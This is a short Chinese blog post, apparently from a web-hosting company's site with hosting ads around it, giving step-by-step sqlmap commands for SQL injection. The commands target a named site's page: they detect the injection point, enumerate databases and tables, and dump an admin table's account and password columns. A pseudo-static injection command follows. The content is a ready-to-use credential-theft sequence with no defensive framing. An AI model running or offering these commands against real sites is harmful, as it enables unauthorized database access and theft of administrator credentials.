SQLMAP实用技巧-创新互联

基础版:

让客户满意是我们工作的目标,不断超越客户的期望值来自于我们对这个行业的热爱。我们立志把好的技术通过有效、简单的方式提供给客户,将通过不懈努力成为客户在信息化领域值得信任、有价值的长期合作伙伴,公司提供的服务项目有:域名与空间、网站空间、营销软件、网站建设、五大连池网站维护、网站推广。
  1. 检查注入点

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11

  2. 列数据库信息

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs

  3. 指定库名列出所有表

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables

  4. 指定库名表名列出所有字段

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns

  5. 指定库名表名字段dump出指定字段

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump

SQLMAP伪静态注入:

注入页面:http://www.xxx.org/news/class/?103.htm

命令:python sqlmap.py -u “http://www.xxx.org/news/class/?103*.html”

另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


本文标题:SQLMAP实用技巧-创新互联
网站地址:http://myzitong.com/article/csigso.html